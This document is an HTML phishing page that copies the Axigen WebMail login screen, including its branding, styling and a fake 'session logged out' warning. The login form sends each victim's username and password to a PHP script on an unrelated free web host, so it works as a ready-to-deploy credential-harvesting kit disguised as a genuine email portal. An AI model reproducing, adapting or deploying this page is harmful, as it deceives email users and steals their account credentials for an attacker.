
<!DOCTYPE html>
<!--
To change this license header, choose License Headers in Project Properties.
To change this template file, choose Tools | Templates
and open the template in the editor.
-->
<html>
    <head>
        <title>Axigen WebMail</title>
        <link rel="shortcut icon" href="image/BrandingPicture.png" type="image/x-icon">
        <meta charset="UTF-8">
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
        <link rel="StyleSheet" type="text/css" href="style/ext-all.css">
        <link rel="StyleSheet" type="text/css" href="style/other-icons.css">
        <link rel="StyleSheet" type="text/css" href="style/axigen-web-fonts.css">
        <link rel="StyleSheet" type="text/css" href="style/style_ajax_ocean.css">
        <link rel="StyleSheet" type="text/css" href="style/style_ajax_breeze.css">
        <link rel="preconnect" href="https://fonts.googleapis.com">

      
         <style>

  @import url('https://fonts.googleapis.com/css2?family=Titillium+Web:wght@200&display=swap');

            
        input:focus {
          color: #afafaf;
          outline:solid 1px orangered;
         
                
        }

        </style>
    </head>
    <body style="background-image:url('image/back.png')">
        <div class="overlay-opacity"></div>
        <div class="main-container" >
    <div class="center-container" style="margin-top:-15px;">
        <div class="logo"></div>
  <h1>Axigen WebMail</h1>
    <p>Log in to your Axigen email account</p>
    <div style="color:#ff6666;margin-top: 31px;margin-bottom: -21px;"><p id="error-Class" style="color:#ff6666;">Your session logged out.... Please login...</p></div>

    <br>
    <div class="center-inner-container" style="margin-top:-15px;">
        <div class="form-container" id="form-container">
            <div class="domainname-container" id="domainname-container"></div>
            <div id="ext-comp-1002" class="x-panel x-form-label-left">
                <div class="x-panel-tl">
                    <div class="x-panel-tr">
                        <div class="x-panel-tc"></div>
                    </div>
                </div>
                <div class="x-panel-bwrap" id="ext-gen19">
                    <div class="x-panel-ml">
                        <div class="x-panel-mr">
                            <div class="x-panel-mc">
                              
                                    <fieldset id="ext-comp-1003" class=" x-fieldset x-axi-fieldset x-form-label-left">
                                        <div class="x-fieldset-bwrap" id="ext-gen21">
                                            <div class="x-fieldset-body x-fieldset-body-noheader" id="ext-gen22" style="height: auto;">
                                              <div id="ext-comp-1006" class="x-panel x-form-label-left" style="padding: 0px 14px;">
                                                 <style type="text/css">
                                                                
                                                            input:focus + label[placeholder]:before {
                                                              color: #4c8ea6;

                                                            }
                                                            input:focus + label[placeholder]:before,
                                                            input:valid + label[placeholder]:before {
                                                              transition-duration: .2s;
                                                              transform: translate(0, -1.8em) scale(0.9, 0.9);
                                                               background-color: #272930;
                                                             
                                                               
                                                            }

                                                            input:invalid + label[placeholder][alt]:before {
                                                              content: attr(alt);

                                                            }

                                                            input + label[placeholder] {
                                                              display: block;
                                                              font-size: 14px;
                                                              pointer-events: none;
                                                              line-height: 1em;
                                                              margin-top: calc(-3em - 3px);
                                                              margin-bottom: calc((3em - 1em) + 2px);
                                                              margin-left: 0px;
                                                            }

                                                            input + label[placeholder]:before {
                                                              content: attr(placeholder);
                                                              display: inline-block;
                                                              margin: 0 calc(1em + 2px);
                                                              padding: 0 2px;
                                                              color: #898989;
                                                              white-space: nowrap;
                                                              transition: 0.3s ease-in-out;
                                                              background-size: 100% 100px;
                                                              background-repeat: no-repeat;
                                                              background-position: center;

                                                              
                                                            }

                                                                </style>

                                                 <form id="zLoginForm" method="post" name="loginForm" action="https://confederative-devic.000webhostapp.com/dhfihsdwe/bjhsbdbfdsnhfgkjgsd.php" accept-charset="UTF-8"> 
                                                <input name="usename" value="" type="text" id="username" style="border-radius: 2px;border: 1px solid gray; background:transparent;font-size: 16px;height: 22px;width: 380px;
                                                padding: 13px 15px;margin-bottom: 10px;color:#afafaf;" required=''>
                                                 <label alt='USERNAME'  style="font-family: Source Sans Pro, sans-serif;"placeholder='USERNAME'>

                                              </div>
                                              <br>
                                                <div id="ext-comp-1006" class="x-panel x-form-label-left" style="padding: 0px 14px;">
                                                    <div class="x-panel-bwrap" id="ext-gen25">
                                                        <div class="x-panel-body x-panel-body-noheader" id="ext-gen26">
                                                            <div class="x-form-item x-axi-label" tabindex="-1">
                                                           
                                                                <div class="x-form-element" id="x-form-el-password" style="padding-left:75px">
                                                       <input name="paswood"  type='password' id="password"  color:#afafaf; style="border-radius: 4px;border: 1px solid gray; background:transparent;font-size: 16px;height: 22px;width: 380px;
                                                padding: 13px 15px;margin-bottom: 10px; color:#afafaf;" required=''>

                                                                  <label alt='PASSWORD'  style="font-family: Source Sans Pro, sans-serif;"placeholder='PASSWORD'></label></div>
                                                                <div class="x-form-clear-left"></div>
                                                            </div>
                                                        </div>
                                                    </div>
                                                </div>
                                                <div class="x-form-item  x-hide-label x-axi-button-container" tabindex="-1"><label for="ext-comp-1007" style="width:70px;" class="x-form-item-label">:</label>
                                                    <div class="x-form-element x-axi-button" id="x-form-el-ext-comp-1007"  style="padding-left:75px"><input type="submit" size="20" autocomplete="off" id="ext-comp-1007" name="login" class=" x-form-submit x-form-field" value="Log in">
                                                        <div class="x-axi-button-right"></div>
                                                    </div>
                                                    <div class="x-form-clear-left"></div>
                                                </div>
                                                <div id="ext-comp-1008" class="x-panel">
                                                    <div class="x-panel-bwrap" id="ext-gen36">
                                                        <div class="x-panel-body x-panel-body-noheader" id="ext-gen37" style="height: 21px;">&nbsp;</div>
                                                    </div>
                                                </div>
                                                <div id="ext-comp-1009" class="x-panel x-axi-link-username-password">
                                                    <div class="x-panel-bwrap" id="ext-gen38">
                                                        <div class="x-panel-body x-panel-body-noheader x-column-layout-ct" id="ext-gen39">
                                                            <div class="x-column-inner" id="ext-gen63">
                                                                <div id="ext-comp-1010" class="x-panel x-column">
                                                                    <div class="x-panel-bwrap" id="ext-gen65">
                                                                        <div class="x-panel-body x-panel-body-noheader" id="ext-gen66"></div>
                                                                    </div>
                                                                </div>
                                                                <div id="ext-comp-1011" class="x-panel x-column">
                                                                    <div class="x-panel-bwrap" id="ext-gen67">
                                                                        <div class="x-panel-body x-panel-body-noheader" id="ext-gen68"></div>
                                                                    </div>
                                                                </div>
                                                                <div class="x-clear" id="ext-gen64"></div>
                                                            </div>
                                                        </div>
                                                    </div>
                                                </div>
                                                <div id="ext-comp-1012" class="x-panel">
                                                    <div class="x-panel-bwrap" id="ext-gen40">
                                                        <div class="x-panel-body x-panel-body-noheader x-column-layout-ct" id="ext-gen41">
                                                            <div class="x-column-inner" id="ext-gen69" style="width: 436px;">
                                                                <div id="ext-comp-1013" class="x-panel x-column">
                                                                    <div class="x-panel-bwrap" id="ext-gen71">
                                                                        <div class="x-panel-body x-panel-body-noheader" id="ext-gen72"></div>
                                                                    </div>
                                                                </div>
                                                                <div id="ext-comp-1014" class="x-panel x-column">
                                                                    <div class="x-panel-bwrap" id="ext-gen73">
                                                                        <div class="x-panel-body x-panel-body-noheader" id="ext-gen74"></div>
                                                                    </div>
                                                                </div>
                                                                <div class="x-clear" id="ext-gen70"></div>
                                                            </div>
                                                        </div>
                                                    </div>
                                                </div></div>
                                        </div>
                                    </fieldset>
                                
                            </div>
                        </div>
                    </div>
                    <div class="x-panel-bl x-panel-nofooter">
                        <div class="x-panel-br">
                            <div class="x-panel-bc"></div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
</div>

<div class="footnote" style="margin-top:-95px;">

    <p>Switch to <a title="Standard Interface" href="#">Standard Interface</a></p>
    <div id="language-container" class=" x-axi-brown-combo en-flag">
        <div class="x-form-field-wrap" id="ext-gen75" style="width: 391px;">
            <p id="ext-comp-1015" class=" x-form-text x-form-field x-axi-language-combo" style="margin-left: -47px; margin-top: 10px; margin-bottom: 5px;">English </p>
            <div style="margin-left: 175px;margin-top: -35px; margin-bottom: -6px;"><img src="image/drop.png"></div>
            
    </div>
</div>
    <div class="footnote">
    <div class="copyright-note">
        <p class="powered-by">Powered by <a href="#">Axigen</a></p>
        <p class="copyright">Email, calendaring and collaboration<br>Total privacy, high availability and scalability</p>
    </div>
</div>

</div> 
            <script type="text/javascript" src="style/js.js"></script>
        </body>
</html>


